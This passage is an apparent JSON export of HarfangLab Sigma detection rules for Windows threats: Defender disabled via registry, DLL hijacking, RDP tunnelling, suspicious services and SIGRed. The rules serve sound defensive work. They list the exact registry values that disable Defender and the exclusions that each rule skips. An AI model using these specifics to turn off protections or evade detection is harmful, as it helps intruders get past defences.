"content": "title: Windows Defender Disabled in Registry\nid: d7778b81-d88b-4182-8bf9-14ade4b1124c\ndescription: |\n Detects Windows Defender being disabled using the registry.\n Attackers might disable Windows Defender to evade detection.\n It is recommended to investigate the process responsible for the registry modification, as well as to look for other suspicious activities on the host.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_global:\n EventType: SetValue\n TargetObject:\n # Legacy global toggle\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware'\n # Real-time monitoring toggle\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring'\n # For registry/events/process monitoring\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring'\n # For process scan when realtime monitoring is turned on again\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable'\n # For files/programs activity monitoring\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows 
Defender\\Real-Time Protection\\DisableOnAccessProtection'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection'\n # For downloaded files\n - 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection'\n - 'HKLM\\Software\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionally for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n #\n # DisableAntiSpyware is deprecated in recent versions of Windows 10.\n # Setting this value to true will not change Microsoft Defender Antivirus behavior on client devices (both managed and unmanaged). 
This setting only applies to Windows Server.\n #\n # DisableAntiSpyware is intended to be used by OEMs and IT Pros to disable Microsoft Defender Antivirus and deploy another antivirus product during deployment.\n # So, the presence of another antivirus product led to set this value by MsMpEng.exe.\n #\n # https://docs.microsoft.com/en-au/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware\n # https://www.windowslatest.com/2020/08/19/microsoft-retires-disableantispyware-for-windows-defender/\n #\n\n selection_antispyware:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows Defender\\DisableAntiSpyware'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n filter_antispyware:\n Image|endswith: '\\MsMpEng.exe'\n ProcessIntegrityLevel: 'System'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msmpeng:\n Image:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n - ProcessOriginalFileName: 
'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n - ProcessAncestors|contains: '|?:\\Windows\\CCM\\CcmExec.exe|'\n\n exclusion_setupplatform:\n Image|endswith: '\\Sources\\setupplatform.exe' # C:\\$WINDOWS.~BT\\Sources\\setupplatform.exe\n\n exclusion_avast:\n Image:\n - '?:\\Program Files\\Avast Software\\Avast\\wsc_proxy.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\wsc_proxy.exe'\n - '?:\\Program Files\\AVAST Software\\Avast Business\\wsc_proxy.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n\n exclusion_trend_micro:\n Image: '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_defender:\n ProcessParentImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseCM.exe'\n\n exclusion_deviceenroller:\n - ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\deviceenroller.exe /o ????????-????-????-????-????????????'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_svchost:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k secsvcs'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_wapt:\n ProcessParentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n exclusion_mousocoreworker:\n ProcessOriginalFileName: 'MoUSOCoreWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding 
???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n\n exclusion_santivirus:\n ProcessImage: '?:\\Program Files (x86)\\Digital Communications\\SAntivirus\\SAntivirusService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Digital Communications Inc'\n\n exclusion_emsystem:\n ProcessImage: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmSystem.exe'\n\n exclusion_userprofile_config:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_windows_management:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s WManSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ansible:\n ProcessCommandLine|contains:\n # \"Ansible requires PowerShell v3.0 or newer\" UTF-16LE with all 3 offsets\n - 'QQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByA'\n - 'EAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcg'\n - 'BAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIA'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n condition: (selection_global or (selection_antispyware and not filter_antispyware)) and not filter_zero and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d7778b81-d88b-4182-8bf9-14ade4b1124c",
"rule_name": "Windows Defender Disabled in Registry",
"rule_description": "Detects Windows Defender being disabled using the registry.\nAttackers might disable Windows Defender to evade detection.\nIt is recommended to investigate the process responsible for the registry modification, as well as to look for other suspicious activities on the host.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d780843d-b5c3-477b-bfc0-6468888ffaa0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599890Z",
"creation_date": "2026-03-23T11:45:34.599893Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wsmanhttpconfig.yml",
"content": "title: DLL Hijacking via wsmanhttpconfig.exe\nid: d780843d-b5c3-477b-bfc0-6468888ffaa0\ndescription: |\n Detects potential Windows DLL Hijacking via wsmanhttpconfig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wsmanhttpconfig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DSROLE.dll'\n - '\\HTTPAPI.dll'\n - '\\mi.dll'\n - '\\miutils.dll'\n - '\\wsmsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d780843d-b5c3-477b-bfc0-6468888ffaa0",
"rule_name": "DLL Hijacking via wsmanhttpconfig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wsmanhttpconfig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d78a7360-f203-4d53-b8fb-f75fa596dd1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612849Z",
"creation_date": "2026-03-23T11:45:34.612853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612860Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/software/S0508/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1572_rdp_protocol_tunneling.yml",
"content": "title: RDP Logon via Network Tunnel\nid: d78a7360-f203-4d53-b8fb-f75fa596dd1a\ndescription: |\n Detects uncommon applications performing loopback connections on IPv4 or IPv6 to the local RDP port.\n Attackers may tunnel network communications through different protocols to avoid network filters and expose services.\n Usually, this is done by establishing an internal port forward from an exposed port to a local port associated with the desired service.\n It is recommended to verify the legitimacy of the process and for suspicious RDP activity on the system.\nreferences:\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/software/S0508/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/02/13\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - '::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n Initiated: 'true'\n DestinationPort: '3389'\n\n # This is handled by the rule 49ed1286-c309-4fb0-bcfc-67f8039069c4\n filter_ngrok:\n - ProcessImage|endswith: '\\ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n - ProcessImphash: 'FF9F3A86709796C17211F9DF12AAE74D'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_forward:\n SourcePort: '3390'\n\n exclusion_browsers:\n 
Image|endswith:\n - '\\chrome.exe'\n - '\\chromium.exe'\n - '\\firefox.exe'\n - '\\brave.exe'\n - '\\librewolf.exe'\n - '\\msedge.exe'\n - '\\msedgewebview2.exe'\n - '\\iexplorer.exe'\n - '\\safari.exe'\n - '\\opera.exe'\n - '\\SmartBrowser-Blink.exe'\n - '\\vivaldi.exe'\n - '\\CefSharp.BrowserSubprocess.exe'\n - '\\AvastBrowser.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k tsgateway'\n - '?:\\Windows\\system32\\svchost.exe -k tsgateway -s TSGateway'\n\n exclusion_mstsc:\n ProcessImage: '?:\\Windows\\System32\\mstsc.exe'\n\n exclusion_wudfhost:\n ProcessImage: '?:\\Windows\\System32\\WUDFHost.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_ipdiva:\n ProcessImage|endswith: '\\bin\\IPdivaGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Systancia SA'\n\n exclusion_intel:\n ProcessImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\dtt_sw.inf_amd64_*\\ipfsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Intel Corporation'\n\n exclusion_ingate:\n ProcessImage|endswith: '\\xGate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Axeda Corporation'\n\n exclusion_connectwise:\n ProcessImage|endswith: '\\LTSVC.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectwise, LLC'\n\n exclusion_zabbix:\n - ProcessAncestors: '|?:\\Program Files\\Zabbix Agent 2\\zabbix_agent2.exe|'\n - ProcessCompany: 'Zabbix SIA'\n ProcessDescription: 'zabbix_agent2.exe'\n\n # too many monitoring script using powershell\n exclusion_powershell:\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_sap:\n - ProcessImage|endswith: '\\SAP BusinessObjects Enterprise *\\win64_x64\\sapjvm\\bin\\java.exe'\n - ProcessCommandLine|endswith: '\\tomcat\\bin\\tomcat?.exe //RS//BOEXI40Tomcat'\n\n exclusion_telnet:\n ProcessImage: '?:\\Windows\\System32\\telnet.exe'\n\n 
exclusion_perplexity:\n ProcessOriginalFileName: 'comet.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PERPLEXITY AI, INC.'\n\n exclusion_ecosia:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ecosia GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d78a7360-f203-4d53-b8fb-f75fa596dd1a",
"rule_name": "RDP Logon via Network Tunnel",
"rule_description": "Detects uncommon applications performing loopback connections on IPv4 or IPv6 to the local RDP port.\nAttackers may tunnel network communications through different protocols to avoid network filters and expose services.\nUsually, this is done by establishing an internal port forward from an exposed port to a local port associated with the desired service.\nIt is recommended to verify the legitimacy of the process and to look for suspicious RDP activity on the system.\n",
"rule_creation_date": "2023-02-13",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d79a2117-2edd-4df0-8347-ad9c7f0bb970",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296295Z",
"creation_date": "2026-03-23T11:45:35.296299Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296306Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blue-mockingbird-cryptominer/",
"https://redcanary.com/threat-detection-report/techniques/windows-service/",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_003_suspicious_service_created.yml",
"content": "title: Suspicious Service Created\nid: d79a2117-2edd-4df0-8347-ad9c7f0bb970\ndescription: |\n Detects the creation of a Windows service that references executables and paths used commonly by attackers, such as powershell.exe, cmd.exe, or \"C:\\Windows\\Temp\".\n Attackers may create Windows services to establish persistence.\n It is recommended to investigate the command-line of the service, as well as the context execution of the process that created the detected sevice.\nreferences:\n - https://redcanary.com/blog/blue-mockingbird-cryptominer/\n - https://redcanary.com/threat-detection-report/techniques/windows-service/\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2025/10/03\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.003\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.ServiceCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: service\n product: windows\ndetection:\n selection:\n OperationType: 'create'\n ServiceCommandLine|contains:\n # Scripts and shells\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\python.exe'\n - '\\python3.exe'\n - '\\python2.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\rundll32.exe'\n - '\\mshta.exe'\n # Suspicious folders\n - ':\\PerfLogs\\'\n - ':\\Users\\\\*\\AppData\\Roaming\\'\n - ':\\Users\\\\*\\AppData\\LocalLow\\'\n - ':\\Users\\Default\\'\n - ':\\Users\\Public\\'\n # Filter out empty images\n ProcessImage|contains: '?'\n\n exclusion_hpqwmiex:\n ProcessImage|endswith: '\\AppData\\Roaming\\\\*\\hpqwmiex.exe'\n ServiceCommandLine|contains: '\\AppData\\Roaming\\\\*\\hpqwmiex.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft 
Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_f5:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'F5 Networks Inc'\n - 'F5, Inc.'\n\n exclusion_zoom:\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n\n exclusion_veam:\n ServiceCommandLine: '?:\\Windows\\Temp\\Veeam.SQL.*\\Veeam.SQL.Service.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_nable:\n ServiceName: 'NableRemoteService'\n\n exclusion_eset:\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_logmein:\n ServiceCommandLine|contains:\n - '?:\\Program Files (x86)\\LogMeIn Rescue Applet\\'\n - '?:\\Program Files\\LogMeIn Rescue Applet\\'\n\n exclusion_assist:\n ProcessSigned: 'true'\n ProcessSignature: 'RG Systèmes SAS'\n\n exclusion_truecrypt:\n ProcessSigned: 'true'\n ProcessSignature: 'TrueCrypt Foundation'\n\n exclusion_opswat:\n ProcessSigned: 'true'\n ProcessSignature: 'OPSWAT, Inc.'\n\n exclusion_iobit:\n ProcessSigned: 'true'\n ProcessSignature: 'IObit CO., LTD'\n\n exclusion_veracrypt:\n ServiceCommandLine|endswith: '\\VeraCrypt\\veracrypt-x64.sys'\n ServiceName: 'veracrypt'\n ProcessImage|endswith:\n - '\\VeraCrypt\\VeraCrypt.exe'\n - '\\VeraCrypt\\VeraCrypt-x64.exe'\n\n exclusion_dhcp_srv:\n ServiceName: 'DHCPServer'\n ServiceCommandLine|endswith: '\\dhcpsrv*\\dhcpsrv.exe\" -service'\n\n exclusion_rustdesk:\n ProcessGrandparentImage|endswith: '\\rustdesk\\rustdesk.exe'\n ServiceName: 'RustDesk'\n\n exclusion_fancontrol:\n ServiceName: 'R0FanControl'\n ServiceCommandLine|endswith: '\\fancontrol-v*\\FanControl.sys'\n\n exclusion_openhardwaremonitor:\n ServiceName: 'WinRing0_1_2_0'\n ServiceCommandLine|endswith: '\\OpenHardwareMonitorLib.sys'\n\n exclusion_sharepoint:\n ServiceCommandLine|contains: '\\Microsoft\\SPMigration\\Bin\\Microsoft.SharePoint.Migration.ClientService.exe'\n ProcessImage: 
'?:\\Windows\\Microsoft.NET\\Framework64\\v*\\InstallUtil.exe'\n\n exclusion_oracle:\n ServiceCommandLine|contains: '\\bin\\ORACLE.EXE'\n ServiceName|contains: 'Oracle'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d79a2117-2edd-4df0-8347-ad9c7f0bb970",
"rule_name": "Suspicious Service Created",
"rule_description": "Detects the creation of a Windows service that references executables and paths used commonly by attackers, such as powershell.exe, cmd.exe, or \"C:\\Windows\\Temp\".\nAttackers may create Windows services to establish persistence.\nIt is recommended to investigate the command-line of the service, as well as the execution context of the process that created the detected service.\n",
"rule_creation_date": "2025-10-03",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7bedad5-e7a1-408b-aad1-6e5919a2de49",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076940Z",
"creation_date": "2026-03-23T11:45:34.076942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076947Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-1350",
"https://www.logpoint.com/fr/blog/serveurs-windows-dns-vulnerabilite-cve-2020-1350/",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_dns_spawning_abnormal_processes.yml",
"content": "title: Abnormal Process Started by dns.exe\nid: d7bedad5-e7a1-408b-aad1-6e5919a2de49\ndescription: |\n Detects the execution of an abnormal process by dns.exe.\n This action can be indicative of the exploitation of CVE-2020-1350 (aka SIGRed), a vulnerability in Microsoft's Domain Name System (DNS) implementation on Windows Server versions from 2003 to 2019.\n To exploit this vulnerability, an unauthenticated attacker needs to send malicious requests to a vulnerable Windows DNS server.\n If successfully exploited, the vulnerability allows the attacker to run arbitrary code in the context of the Local System Account.\n It is recommended to investigate the process tree for suspicious activities and to isolate the infected system if the exploitation is confirmed.\nreferences:\n - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-1350\n - 